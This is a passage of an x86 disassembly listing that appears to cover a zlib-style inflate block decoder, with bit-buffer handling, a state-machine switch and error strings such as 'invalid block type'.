; ---------------------------------------------------------------------------
loc_50BB47: ; CODE XREF: sub_50BB0D+13�j
; sub_50BB0D+26�j
mov eax, [ebp+var_8]
xor edx, edx
div [ebp+arg_4]
mov eax, edx
leave
retn
sub_50BB0D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50BB53 proc near ; CODE XREF: sub_50BBBF+7D�p
; sub_50C5B0+F�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_8]
push ebx
xor ebx, ebx
push esi
mov esi, [ebp+arg_0]
cmp eax, ebx
push edi
jz short loc_50BB6A
mov ecx, [esi+3Ch]
mov [eax], ecx
loc_50BB6A: ; CODE XREF: sub_50BB53+10�j
mov eax, [esi]
mov edi, [ebp+arg_4]
cmp eax, 4
jz short loc_50BB79
cmp eax, 5
jnz short loc_50BB84
loc_50BB79: ; CODE XREF: sub_50BB53+1F�j
push dword ptr [esi+0Ch]
push dword ptr [edi+28h]
call dword ptr [edi+24h]
pop ecx
pop ecx
loc_50BB84: ; CODE XREF: sub_50BB53+24�j
cmp dword ptr [esi], 6
jnz short loc_50BB94
push edi
push dword ptr [esi+4]
call sub_50CBD8
pop ecx
pop ecx
loc_50BB94: ; CODE XREF: sub_50BB53+34�j
mov eax, [esi+28h]
mov [esi], ebx
mov [esi+34h], eax
mov [esi+30h], eax
mov eax, [esi+38h]
mov [esi+1Ch], ebx
cmp eax, ebx
mov [esi+20h], ebx
jz short loc_50BBBA
push ebx
push ebx
push ebx
call eax
mov [esi+3Ch], eax
add esp, 0Ch
mov [edi+30h], eax
loc_50BBBA: ; CODE XREF: sub_50BB53+57�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_50BB53 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50BBBF proc near ; CODE XREF: sub_50CF41+AF�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
push 40h
push 1
push dword ptr [esi+28h]
call dword ptr [esi+20h]
mov edi, eax
add esp, 0Ch
test edi, edi
jz short loc_50BC26
push 5A0h
push 8
push dword ptr [esi+28h]
call dword ptr [esi+20h]
add esp, 0Ch
mov [edi+24h], eax
test eax, eax
jnz short loc_50BBFD
push edi
push dword ptr [esi+28h]
call dword ptr [esi+24h]
pop ecx
pop ecx
jmp short loc_50BC26
; ---------------------------------------------------------------------------
loc_50BBFD: ; CODE XREF: sub_50BBBF+31�j
mov ebx, [ebp+arg_8]
push ebx
push 1
push dword ptr [esi+28h]
call dword ptr [esi+20h]
add esp, 0Ch
mov [edi+28h], eax
test eax, eax
jnz short loc_50BC2A
push dword ptr [edi+24h]
push dword ptr [esi+28h]
call dword ptr [esi+24h]
push edi
push dword ptr [esi+28h]
call dword ptr [esi+24h]
add esp, 10h
loc_50BC26: ; CODE XREF: sub_50BBBF+1A�j
; sub_50BBBF+3C�j
xor eax, eax
jmp short loc_50BC46
; ---------------------------------------------------------------------------
loc_50BC2A: ; CODE XREF: sub_50BBBF+52�j
and dword ptr [edi], 0
add eax, ebx
mov [edi+2Ch], eax
mov eax, [ebp+arg_4]
push 0
push esi
push edi
mov [edi+38h], eax
call sub_50BB53
add esp, 0Ch
mov eax, edi
loc_50BC46: ; CODE XREF: sub_50BBBF+69�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_50BBBF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50BC4B proc near ; CODE XREF: sub_50D043+11B�p
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 30h
mov eax, [ebp+arg_4]
push ebx
mov ebx, [ebp+arg_0]
push esi
mov ecx, [eax]
mov eax, [eax+4]
mov [ebp+var_8], eax
mov eax, [ebx+20h]
mov [ebp+arg_0], eax
mov eax, [ebx+1Ch]
mov [ebp+var_10], ecx
mov ecx, [ebx+34h]
mov [ebp+var_4], eax
mov eax, [ebx+30h]
cmp ecx, eax
push edi
mov [ebp+var_C], ecx
jnb short loc_50BC83
sub eax, ecx
dec eax
jmp short loc_50BC88
; ---------------------------------------------------------------------------
loc_50BC83: ; CODE XREF: sub_50BC4B+31�j
mov eax, [ebx+2Ch]
sub eax, ecx
loc_50BC88: ; CODE XREF: sub_50BC4B+36�j
mov [ebp+var_14], eax
loc_50BC8B: ; CODE XREF: sub_50BC4B+AD�j
; sub_50BC4B+10B�j ...
mov eax, [ebx]
cmp eax, 9 ; switch 10 cases
ja loc_50C550 ; default
jmp ds:off_50C588[eax*4] ; switch jump
loc_50BC9D: ; DATA XREF: _5:off_50C588�o
mov edi, [ebp+var_4] ; jumptable 0050BC96 case 0
mov esi, [ebp+arg_0]
mov edx, [ebp+var_10]
cmp edi, 3
jnb short loc_50BCD7
loc_50BCAB: ; CODE XREF: sub_50BC4B+8A�j
cmp [ebp+var_8], 0
jz loc_50C28C
movzx eax, byte ptr [edx]
and [ebp+arg_8], 0
dec [ebp+var_8]
mov ecx, edi
add edi, 8
shl eax, cl
mov [ebp+var_4], edi
or esi, eax
inc edx
cmp edi, 3
mov [ebp+arg_0], esi
mov [ebp+var_10], edx
jb short loc_50BCAB
loc_50BCD7: ; CODE XREF: sub_50BC4B+5E�j
mov eax, esi
and eax, 7
mov ecx, eax
shr eax, 1
and ecx, 1
sub eax, 0
mov [ebx+18h], ecx
jz short loc_50BD5B
dec eax
jz short loc_50BD0D
dec eax
jz short loc_50BCFA
dec eax
jz loc_50C2A7
jmp short loc_50BC8B
; ---------------------------------------------------------------------------
loc_50BCFA: ; CODE XREF: sub_50BC4B+A4�j
push 3
pop eax
shr esi, 3
sub edi, eax
mov [ebp+arg_0], esi
mov [ebp+var_4], edi
jmp loc_50BDE7
; ---------------------------------------------------------------------------
loc_50BD0D: ; CODE XREF: sub_50BC4B+A1�j
mov edi, [ebp+arg_4]
lea eax, [ebp+var_1C]
push edi
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_28]
push eax
call sub_50D8AF
push edi
push [ebp+var_1C]
push [ebp+var_20]
push [ebp+var_24]
push [ebp+var_28]
call sub_50C5E6
add esp, 28h
mov [ebx+4], eax
test eax, eax
jz loc_50C2D7
shr esi, 3
sub [ebp+var_4], 3
mov [ebp+arg_0], esi
mov dword ptr [ebx], 6
jmp loc_50BC8B
; ---------------------------------------------------------------------------
loc_50BD5B: ; CODE XREF: sub_50BC4B+9E�j
sub edi, 3
mov dword ptr [ebx], 1
mov ecx, edi
and ecx, 7
shr esi, 3
shr esi, cl
sub edi, ecx
mov [ebp+var_4], edi
mov [ebp+arg_0], esi
jmp loc_50BC8B
; ---------------------------------------------------------------------------
loc_50BD7B: ; CODE XREF: sub_50BC4B+4B�j
; DATA XREF: _5:off_50C588�o
mov ecx, [ebp+var_4] ; jumptable 0050BC96 case 1
mov esi, [ebp+arg_0]
cmp ecx, 20h
jnb short loc_50BDAF
mov edx, [ebp+var_10]
xor edi, edi
loc_50BD8B: ; CODE XREF: sub_50BC4B+160�j
cmp [ebp+var_8], edi
jz loc_50C300
movzx eax, byte ptr [edx]
dec [ebp+var_8]
mov [ebp+arg_8], edi
shl eax, cl
add ecx, 8
or esi, eax
inc edx
cmp ecx, 20h
mov [ebp+var_10], edx
jb short loc_50BD8B
jmp short loc_50BDB2
; ---------------------------------------------------------------------------
loc_50BDAF: ; CODE XREF: sub_50BC4B+139�j
mov edx, [ebp+var_10]
loc_50BDB2: ; CODE XREF: sub_50BC4B+162�j
mov edi, esi
mov eax, esi
not edi
and eax, 0FFFFh
shr edi, 10h
xor edi, eax
jnz loc_50C30E
mov [ebx+4], eax
xor eax, eax
cmp [ebx+4], eax
mov [ebp+var_4], eax
mov [ebp+arg_0], eax
jz short loc_50BDDD
push 2
pop eax
jmp short loc_50BDE7
; ---------------------------------------------------------------------------
loc_50BDDD: ; CODE XREF: sub_50BC4B+18B�j
; sub_50BC4B+288�j
mov eax, [ebx+18h]
neg eax
sbb eax, eax
and eax, 7
loc_50BDE7: ; CODE XREF: sub_50BC4B+BD�j
; sub_50BC4B+190�j
mov [ebx], eax
jmp loc_50BC8B
; ---------------------------------------------------------------------------
loc_50BDEE: ; CODE XREF: sub_50BC4B+4B�j
; DATA XREF: _5:off_50C588�o
cmp [ebp+var_8], 0 ; jumptable 0050BC96 case 2
jz loc_50C326
mov ecx, [ebp+var_14]
test ecx, ecx
jnz loc_50BE93
mov ecx, [ebx+2Ch]
mov edx, [ebp+var_C]
cmp edx, ecx
jnz short loc_50BE30
mov eax, [ebx+30h]
mov esi, [ebx+28h]
cmp eax, esi
jz short loc_50BE30
mov edx, esi
cmp edx, eax
mov [ebp+var_C], edx
jnb short loc_50BE27
sub eax, edx
dec eax
mov ecx, eax
jmp short loc_50BE29
; ---------------------------------------------------------------------------
loc_50BE27: ; CODE XREF: sub_50BC4B+1D3�j
sub ecx, edx
loc_50BE29: ; CODE XREF: sub_50BC4B+1DA�j
test ecx, ecx
mov [ebp+var_14], ecx
jnz short loc_50BE93
loc_50BE30: ; CODE XREF: sub_50BC4B+1C0�j
; sub_50BC4B+1CA�j
push [ebp+arg_8]
mov esi, [ebp+arg_4]
mov [ebx+34h], edx
push esi
push ebx
call sub_50D8DE
mov edx, [ebx+34h]
mov [ebp+arg_8], eax
mov eax, [ebx+30h]
add esp, 0Ch
cmp edx, eax
mov [ebp+var_C], edx
jnb short loc_50BE5A
mov ecx, eax
sub ecx, edx
dec ecx
jmp short loc_50BE5F
; ---------------------------------------------------------------------------
loc_50BE5A: ; CODE XREF: sub_50BC4B+206�j
mov ecx, [ebx+2Ch]
sub ecx, edx
loc_50BE5F: ; CODE XREF: sub_50BC4B+20D�j
mov edi, [ebx+2Ch]
mov [ebp+var_14], ecx
cmp edx, edi
mov [ebp+var_18], edi
jnz short loc_50BE8B
mov edi, [ebx+28h]
cmp eax, edi
jz short loc_50BE8B
mov edx, edi
cmp edx, eax
mov [ebp+var_C], edx
jnb short loc_50BE83
sub eax, edx
dec eax
mov ecx, eax
jmp short loc_50BE88
; ---------------------------------------------------------------------------
loc_50BE83: ; CODE XREF: sub_50BC4B+22F�j
mov ecx, [ebp+var_18]
sub ecx, edx
loc_50BE88: ; CODE XREF: sub_50BC4B+236�j
mov [ebp+var_14], ecx
loc_50BE8B: ; CODE XREF: sub_50BC4B+21F�j
; sub_50BC4B+226�j
test ecx, ecx
jz loc_50C347
loc_50BE93: ; CODE XREF: sub_50BC4B+1B2�j
; sub_50BC4B+1E3�j
mov eax, [ebx+4]
and [ebp+arg_8], 0
cmp eax, [ebp+var_8]
jbe short loc_50BEA2
mov eax, [ebp+var_8]
loc_50BEA2: ; CODE XREF: sub_50BC4B+252�j
cmp eax, ecx
jbe short loc_50BEA8
mov eax, ecx
loc_50BEA8: ; CODE XREF: sub_50BC4B+259�j
mov esi, [ebp+var_10]
mov edi, [ebp+var_C]
mov ecx, eax
add [ebp+var_10], eax
mov edx, ecx
sub [ebp+var_8], eax
shr ecx, 2
rep movsd
add [ebp+var_C], eax
sub [ebp+var_14], eax
mov ecx, edx
and ecx, 3
rep movsb
sub [ebx+4], eax
jnz loc_50BC8B
jmp loc_50BDDD
; ---------------------------------------------------------------------------
loc_50BED8: ; CODE XREF: sub_50BC4B+4B�j
; DATA XREF: _5:off_50C588�o
mov ecx, [ebp+var_4] ; jumptable 0050BC96 case 3
mov edi, [ebp+var_10]
cmp ecx, 0Eh
jnb short loc_50BF08
loc_50BEE3: ; CODE XREF: sub_50BC4B+2BB�j
cmp [ebp+var_8], 0
jz loc_50C370
movzx eax, byte ptr [edi]
and [ebp+arg_8], 0
dec [ebp+var_8]
shl eax, cl
add ecx, 8
mov [ebp+var_4], ecx
or [ebp+arg_0], eax
inc edi
cmp ecx, 0Eh
jb short loc_50BEE3
loc_50BF08: ; CODE XREF: sub_50BC4B+296�j
mov eax, [ebp+arg_0]
and eax, 3FFFh
mov ecx, eax
mov [ebx+4], eax
and ecx, 1Fh
cmp ecx, 1Dh
ja loc_50C3C2
mov edx, eax
and edx, 3E0h
cmp edx, 3A0h
ja loc_50C3C2
mov esi, [ebp+arg_4]
push 4
shr eax, 5
and eax, 1Fh
lea eax, [eax+ecx+102h]
push eax
push dword ptr [esi+28h]
call dword ptr [esi+20h]
add esp, 0Ch
mov [ebx+0Ch], eax
test eax, eax
jz loc_50C39A
shr [ebp+arg_0], 0Eh
sub [ebp+var_4], 0Eh
and dword ptr [ebx+8], 0
mov dword ptr [ebx], 4
jmp short loc_50BF76
; ---------------------------------------------------------------------------
loc_50BF70: ; CODE XREF: sub_50BC4B+4B�j
; DATA XREF: _5:off_50C588�o
mov edi, [ebp+var_10] ; jumptable 0050BC96 case 4
mov esi, [ebp+arg_4]
loc_50BF76: ; CODE XREF: sub_50BC4B+323�j
mov eax, [ebx+4]
shr eax, 0Ah
add eax, 4
cmp [ebx+8], eax
jnb short loc_50BFDF
loc_50BF84: ; CODE XREF: sub_50BC4B+392�j
mov ecx, [ebp+var_4]
loc_50BF87: ; CODE XREF: sub_50BC4B+361�j
cmp ecx, 3
jnb short loc_50BFAE
cmp [ebp+var_8], 0
jz loc_50C432
movzx eax, byte ptr [edi]
and [ebp+arg_8], 0
dec [ebp+var_8]
shl eax, cl
or [ebp+arg_0], eax
inc edi
add ecx, 8
mov [ebp+var_4], ecx
jmp short loc_50BF87
; ---------------------------------------------------------------------------
loc_50BFAE: ; CODE XREF: sub_50BC4B+33F�j
mov ecx, [ebx+8]
mov eax, [ebp+arg_0]
mov edx, [ebx+0Ch]
and eax, 7
mov ecx, ds:dword_50E060[ecx*4]
sub [ebp+var_4], 3
shr [ebp+arg_0], 3
mov [edx+ecx*4], eax
mov ecx, [ebx+4]
inc dword ptr [ebx+8]
mov eax, [ebx+8]
shr ecx, 0Ah
add ecx, 4
cmp eax, ecx
jb short loc_50BF84
loc_50BFDF: ; CODE XREF: sub_50BC4B+337�j
; sub_50BC4B+3AE�j
cmp dword ptr [ebx+8], 13h
jnb short loc_50BFFB
mov eax, [ebx+8]
mov ecx, [ebx+0Ch]
mov eax, ds:dword_50E060[eax*4]
and dword ptr [ecx+eax*4], 0
inc dword ptr [ebx+8]
jmp short loc_50BFDF
; ---------------------------------------------------------------------------
loc_50BFFB: ; CODE XREF: sub_50BC4B+398�j
push esi
lea ecx, [ebx+14h]
push dword ptr [ebx+24h]
lea eax, [ebx+10h]
push ecx
push eax
push dword ptr [ebx+0Ch]
mov dword ptr [eax], 7
call sub_50D3A6
add esp, 14h
mov [ebp+var_14], eax
test eax, eax
jnz loc_50C3F2
and [ebx+8], eax
mov dword ptr [ebx], 5
jmp short loc_50C034
; ---------------------------------------------------------------------------
loc_50C02E: ; CODE XREF: sub_50BC4B+4B�j
; DATA XREF: _5:off_50C588�o
mov edi, [ebp+var_10] ; jumptable 0050BC96 case 5
mov esi, [ebp+arg_4]
loc_50C034: ; CODE XREF: sub_50BC4B+3E1�j
; sub_50BC4B+46B�j ...
mov eax, [ebx+4]
mov ecx, [ebx+8]
mov edx, eax
and eax, 1Fh
shr edx, 5
and edx, 1Fh
lea eax, [edx+eax+102h]
cmp ecx, eax
jnb loc_50C178
mov eax, [ebx+10h]
loc_50C057: ; CODE XREF: sub_50BC4B+432�j
cmp [ebp+var_4], eax
jnb short loc_50C07F
cmp [ebp+var_8], 0
jz loc_50C432
movzx edx, byte ptr [edi]
mov ecx, [ebp+var_4]
and [ebp+arg_8], 0
dec [ebp+var_8]
shl edx, cl
or [ebp+arg_0], edx
inc edi
add [ebp+var_4], 8
jmp short loc_50C057
; ---------------------------------------------------------------------------
loc_50C07F: ; CODE XREF: sub_50BC4B+40F�j
mov eax, ds:dword_510318[eax*4]
mov ecx, [ebx+14h]
and eax, [ebp+arg_0]
mov edx, [ecx+eax*8+4]
lea eax, [ecx+eax*8]
cmp edx, 10h
mov [ebp+var_18], edx
movzx ecx, byte ptr [eax+1]
mov [ebp+var_14], ecx
jnb short loc_50C0BB
shr [ebp+arg_0], cl
mov eax, ecx
mov ecx, [ebx+0Ch]
sub [ebp+var_4], eax
mov eax, [ebx+8]
mov [ecx+eax*4], edx
inc dword ptr [ebx+8]
jmp loc_50C034
; ---------------------------------------------------------------------------
loc_50C0BB: ; CODE XREF: sub_50BC4B+455�j
cmp edx, 12h
jnz short loc_50C0C5
push 7
pop eax
jmp short loc_50C0C8
; ---------------------------------------------------------------------------
loc_50C0C5: ; CODE XREF: sub_50BC4B+473�j
lea eax, [edx-0Eh]
loc_50C0C8: ; CODE XREF: sub_50BC4B+478�j
xor ecx, ecx
cmp edx, 12h
setnz cl
dec ecx
and ecx, 8
add ecx, 3
mov [ebp+var_10], ecx
loc_50C0DA: ; CODE XREF: sub_50BC4B+4BB�j
mov ecx, [ebp+var_14]
lea edx, [eax+ecx]
cmp [ebp+var_4], edx
jnb short loc_50C108
cmp [ebp+var_8], 0
jz loc_50C432
movzx edx, byte ptr [edi]
mov ecx, [ebp+var_4]
and [ebp+arg_8], 0
dec [ebp+var_8]
shl edx, cl
or [ebp+arg_0], edx
inc edi
add [ebp+var_4], 8
jmp short loc_50C0DA
; ---------------------------------------------------------------------------
loc_50C108: ; CODE XREF: sub_50BC4B+498�j
shr [ebp+arg_0], cl
mov ecx, ds:dword_510318[eax*4]
and ecx, [ebp+arg_0]
add [ebp+var_10], ecx
mov ecx, eax
shr [ebp+arg_0], cl
mov ecx, [ebp+var_14]
add eax, ecx
mov ecx, [ebx+8]
sub [ebp+var_4], eax
mov eax, [ebx+4]
mov edx, eax
and eax, 1Fh
shr edx, 5
and edx, 1Fh
lea eax, [edx+eax+102h]
mov edx, [ebp+var_10]
add edx, ecx
cmp edx, eax
ja loc_50C456
cmp [ebp+var_18], 10h
jnz short loc_50C162
cmp ecx, 1
jb loc_50C456
mov eax, [ebx+0Ch]
mov eax, [eax+ecx*4-4]
jmp short loc_50C164
; ---------------------------------------------------------------------------
loc_50C162: ; CODE XREF: sub_50BC4B+503�j
xor eax, eax
loc_50C164: ; CODE XREF: sub_50BC4B+515�j
; sub_50BC4B+523�j
mov edx, [ebx+0Ch]
mov [edx+ecx*4], eax
inc ecx
dec [ebp+var_10]
jnz short loc_50C164
mov [ebx+8], ecx
jmp loc_50C034
; ---------------------------------------------------------------------------
loc_50C178: ; CODE XREF: sub_50BC4B+403�j
push esi
lea ecx, [ebp+var_2C]
push dword ptr [ebx+24h]
mov eax, [ebx+4]
and dword ptr [ebx+14h], 0
mov [ebp+var_18], 9
push ecx
lea ecx, [ebp+var_30]
push ecx
lea ecx, [ebp+var_10]
push ecx
lea ecx, [ebp+var_18]
push ecx
mov ecx, eax
push dword ptr [ebx+0Ch]
and eax, 1Fh
shr ecx, 5
and ecx, 1Fh
add eax, 101h
inc ecx
mov [ebp+var_10], 6
push ecx
push eax
call sub_50D7AC
add esp, 24h
mov [ebp+var_14], eax
test eax, eax
jnz loc_50C49E
push esi
push [ebp+var_2C]
push [ebp+var_30]
push [ebp+var_10]
push [ebp+var_18]
call sub_50C5E6
add esp, 14h
test eax, eax
jz loc_50C39A
push dword ptr [ebx+0Ch]
mov [ebx+4], eax
push dword ptr [esi+28h]
call dword ptr [esi+24h]
pop ecx
mov dword ptr [ebx], 6
pop ecx
jmp short loc_50C203
; ---------------------------------------------------------------------------
loc_50C1FD: ; CODE XREF: sub_50BC4B+4B�j
; DATA XREF: _5:off_50C588�o
mov edi, [ebp+var_10] ; jumptable 0050BC96 case 6
mov esi, [ebp+arg_4]
loc_50C203: ; CODE XREF: sub_50BC4B+5B0�j
mov eax, [ebp+arg_0]
push [ebp+arg_8]
mov [ebx+20h], eax
mov eax, [ebp+var_4]
mov [ebx+1Ch], eax
mov eax, [ebp+var_8]
mov [esi+4], eax
mov eax, edi
sub eax, [esi]
push esi
mov [esi], edi
push ebx
add [esi+8], eax
mov eax, [ebp+var_C]
mov [ebx+34h], eax
call sub_50C61A
add esp, 0Ch
cmp eax, 1
jnz loc_50C4EE
and [ebp+arg_8], 0
push esi
push dword ptr [ebx+4]
call sub_50CBD8
mov eax, [esi+4]
mov edi, [esi]
mov [ebp+var_8], eax
mov eax, [ebx+20h]
pop ecx
mov [ebp+arg_0], eax
mov eax, [ebx+1Ch]
pop ecx
mov ecx, [ebx+34h]
mov [ebp+var_4], eax
mov eax, [ebx+30h]
mov [ebp+var_10], edi
cmp ecx, eax
mov [ebp+var_C], ecx
jnb short loc_50C272
sub eax, ecx
dec eax
jmp short loc_50C277
; ---------------------------------------------------------------------------
loc_50C272: ; CODE XREF: sub_50BC4B+620�j
mov eax, [ebx+2Ch]
sub eax, ecx
loc_50C277: ; CODE XREF: sub_50BC4B+625�j
cmp dword ptr [ebx+18h], 0
mov [ebp+var_14], eax
jnz loc_50C4A7
and dword ptr [ebx], 0
jmp loc_50BC8B
; ---------------------------------------------------------------------------
loc_50C28C: ; CODE XREF: sub_50BC4B+64�j
mov eax, [ebp+arg_4]
mov [ebx+20h], esi
mov [ebx+1Ch], edi
and dword ptr [eax+4], 0
loc_50C299: ; CODE XREF: sub_50BC4B+6C1�j
mov ecx, edx
sub ecx, [eax]
mov [eax], edx
add [eax+8], ecx
jmp loc_50C38C
; ---------------------------------------------------------------------------
loc_50C2A7: ; CODE XREF: sub_50BC4B+A7�j
mov eax, [ebp+arg_4]
mov dword ptr [ebx], 9
shr esi, 3
add edi, 0FFFFFFFDh
mov dword ptr [eax+18h], offset aInvalidBlockTy ; "invalid block type"
mov [ebx+20h], esi
mov [ebx+1Ch], edi
loc_50C2C3: ; CODE XREF: sub_50BC4B+6D9�j
mov ecx, [ebp+var_8]
mov [eax+4], ecx
mov ecx, edx
sub ecx, [eax]
mov [eax], edx
add [eax+8], ecx
jmp loc_50C546
; ---------------------------------------------------------------------------
loc_50C2D7: ; CODE XREF: sub_50BC4B+F5�j
mov eax, [ebp+var_4]
mov [ebx+20h], esi
mov [ebx+1Ch], eax
mov eax, [ebp+var_8]
mov [edi+4], eax
mov eax, [ebp+var_10]
mov ecx, eax
push 0FFFFFFFCh
sub ecx, [edi]
mov [edi], eax
mov eax, [ebp+var_C]
push edi
add [edi+8], ecx
mov [ebx+34h], eax
jmp loc_50C57A
; ---------------------------------------------------------------------------
loc_50C300: ; CODE XREF: sub_50BC4B+143�j
mov eax, [ebp+arg_4]
mov [ebx+20h], esi
mov [ebx+1Ch], ecx
mov [eax+4], edi
jmp short loc_50C299
; ---------------------------------------------------------------------------
loc_50C30E: ; CODE XREF: sub_50BC4B+177�j
mov eax, [ebp+arg_4]
mov dword ptr [ebx], 9
mov dword ptr [eax+18h], offset aInvalidStoredB ; "invalid stored block lengths"
mov [ebx+20h], esi
mov [ebx+1Ch], ecx
jmp short loc_50C2C3
; ---------------------------------------------------------------------------
loc_50C326: ; CODE XREF: sub_50BC4B+1A7�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_10]
mov [ebx+20h], eax
mov eax, [ebp+var_4]
mov [ebx+1Ch], eax
mov eax, [ebp+arg_4]
mov edx, ecx
sub edx, [eax]
and dword ptr [eax+4], 0
mov [eax], ecx
add [eax+8], edx
jmp short loc_50C38C
; ---------------------------------------------------------------------------
loc_50C347: ; CODE XREF: sub_50BC4B+242�j
mov eax, [ebp+arg_0]
mov [ebx+20h], eax
mov eax, [ebp+var_4]
mov [ebx+1Ch], eax
mov eax, [ebp+var_8]
mov [esi+4], eax
mov eax, [ebp+var_10]
mov ecx, eax
sub ecx, [esi]
mov [esi], eax
add [esi+8], ecx
mov [ebx+34h], edx
loc_50C368: ; CODE XREF: sub_50BC4B+806�j
push [ebp+arg_8]
jmp loc_50C522
; ---------------------------------------------------------------------------
loc_50C370: ; CODE XREF: sub_50BC4B+29C�j
mov eax, [ebp+arg_0]
mov ecx, edi
mov [ebx+20h], eax
mov eax, [ebp+var_4]
mov [ebx+1Ch], eax
mov eax, [ebp+arg_4]
sub ecx, [eax]
and dword ptr [eax+4], 0
mov [eax], edi
add [eax+8], ecx
loc_50C38C: ; CODE XREF: sub_50BC4B+657�j
; sub_50BC4B+6FA�j
mov ecx, [ebp+var_C]
push [ebp+arg_8]
mov [ebx+34h], ecx
jmp loc_50C579
; ---------------------------------------------------------------------------
loc_50C39A: ; CODE XREF: sub_50BC4B+30B�j
; sub_50BC4B+596�j
mov eax, [ebp+arg_0]
push 0FFFFFFFCh
mov [ebx+20h], eax
mov eax, [ebp+var_4]
mov [ebx+1Ch], eax
mov eax, [ebp+var_8]
mov [esi+4], eax
mov eax, edi
sub eax, [esi]
mov [esi], edi
add [esi+8], eax
mov eax, [ebp+var_C]
mov [ebx+34h], eax
jmp loc_50C522
; ---------------------------------------------------------------------------
loc_50C3C2: ; CODE XREF: sub_50BC4B+2D0�j
; sub_50BC4B+2E4�j
mov eax, [ebp+arg_4]
mov ecx, [ebp+arg_0]
mov dword ptr [ebx], 9
mov dword ptr [eax+18h], offset aTooManyLengthO ; "too many length or distance symbols"
mov [ebx+20h], ecx
mov ecx, [ebp+var_4]
mov [ebx+1Ch], ecx
mov ecx, [ebp+var_8]
mov [eax+4], ecx
mov ecx, edi
sub ecx, [eax]
mov [eax], edi
add [eax+8], ecx
jmp loc_50C546
; ---------------------------------------------------------------------------
loc_50C3F2: ; CODE XREF: sub_50BC4B+3D2�j
cmp [ebp+var_14], 0FFFFFFFDh
loc_50C3F6: ; CODE XREF: sub_50BC4B+857�j
jnz short loc_50C409
push dword ptr [ebx+0Ch]
push dword ptr [esi+28h]
call dword ptr [esi+24h]
pop ecx
mov dword ptr [ebx], 9
pop ecx
loc_50C409: ; CODE XREF: sub_50BC4B:loc_50C3F6�j
mov eax, [ebp+arg_0]
push [ebp+var_14]
mov [ebx+20h], eax
mov eax, [ebp+var_4]
mov [ebx+1Ch], eax
mov eax, [ebp+var_8]
mov [esi+4], eax
mov eax, edi
sub eax, [esi]
mov [esi], edi
add [esi+8], eax
mov eax, [ebp+var_C]
mov [ebx+34h], eax
jmp loc_50C522
; ---------------------------------------------------------------------------
loc_50C432: ; CODE XREF: sub_50BC4B+345�j
; sub_50BC4B+415�j ...
mov eax, [ebp+arg_0]
mov [ebx+20h], eax
mov eax, [ebp+var_4]
mov [ebx+1Ch], eax
and dword ptr [esi+4], 0
mov eax, edi
sub eax, [esi]
mov [esi], edi
add [esi+8], eax
mov eax, [ebp+var_C]
mov [ebx+34h], eax
jmp loc_50C368
; ---------------------------------------------------------------------------
loc_50C456: ; CODE XREF: sub_50BC4B+4F9�j
; sub_50BC4B+508�j
push dword ptr [ebx+0Ch]
push dword ptr [esi+28h]
call dword ptr [esi+24h]
mov eax, [ebp+arg_0]
mov dword ptr [ebx], 9
mov dword ptr [esi+18h], offset aInvalidBitLeng ; "invalid bit length repeat"
mov [ebx+20h], eax
mov eax, [ebp+var_4]
push 0FFFFFFFDh
mov [ebx+1Ch], eax
mov eax, [ebp+var_8]
mov [esi+4], eax
mov eax, edi
sub eax, [esi]
push esi
mov [esi], edi
push ebx
add [esi+8], eax
mov eax, [ebp+var_C]
mov [ebx+34h], eax
call sub_50D8DE
add esp, 14h
jmp loc_50C583
; ---------------------------------------------------------------------------
loc_50C49E: ; CODE XREF: sub_50BC4B+579�j
cmp [ebp+var_14], 0FFFFFFFDh
jmp loc_50C3F6
; ---------------------------------------------------------------------------
loc_50C4A7: ; CODE XREF: sub_50BC4B+633�j
mov dword ptr [ebx], 7
jmp short loc_50C4B8
; ---------------------------------------------------------------------------
loc_50C4AF: ; CODE XREF: sub_50BC4B+4B�j
; DATA XREF: _5:off_50C588�o
mov edi, [ebp+var_10] ; jumptable 0050BC96 case 7
mov esi, [ebp+arg_4]
mov ecx, [ebp+var_C]
loc_50C4B8: ; CODE XREF: sub_50BC4B+862�j
push [ebp+arg_8]
mov [ebx+34h], ecx
push esi
push ebx
call sub_50D8DE
mov ecx, [ebx+34h]
add esp, 0Ch
cmp [ebx+30h], ecx
jz short loc_50C4F1
mov edx, [ebp+arg_0]
mov [ebx+20h], edx
mov edx, [ebp+var_4]
mov [ebx+1Ch], edx
mov edx, [ebp+var_8]
mov [esi+4], edx
mov edx, edi
sub edx, [esi]
mov [esi], edi
add [esi+8], edx
mov [ebx+34h], ecx
loc_50C4EE: ; CODE XREF: sub_50BC4B+5E9�j
push eax
jmp short loc_50C522
; ---------------------------------------------------------------------------
loc_50C4F1: ; CODE XREF: sub_50BC4B+883�j
mov dword ptr [ebx], 8
jmp short loc_50C502
; ---------------------------------------------------------------------------
loc_50C4F9: ; CODE XREF: sub_50BC4B+4B�j
; DATA XREF: _5:off_50C588�o
mov edi, [ebp+var_10] ; jumptable 0050BC96 case 8
mov esi, [ebp+arg_4]
mov ecx, [ebp+var_C]
loc_50C502: ; CODE XREF: sub_50BC4B+8AC�j
mov eax, [ebp+arg_0]
push 1
mov [ebx+20h], eax
mov eax, [ebp+var_4]
mov [ebx+1Ch], eax
mov eax, [ebp+var_8]
mov [esi+4], eax
mov eax, edi
sub eax, [esi]
mov [esi], edi
add [esi+8], eax
mov [ebx+34h], ecx
loc_50C522: ; CODE XREF: sub_50BC4B+720�j
; sub_50BC4B+772�j ...
push esi
jmp short loc_50C57A
; ---------------------------------------------------------------------------
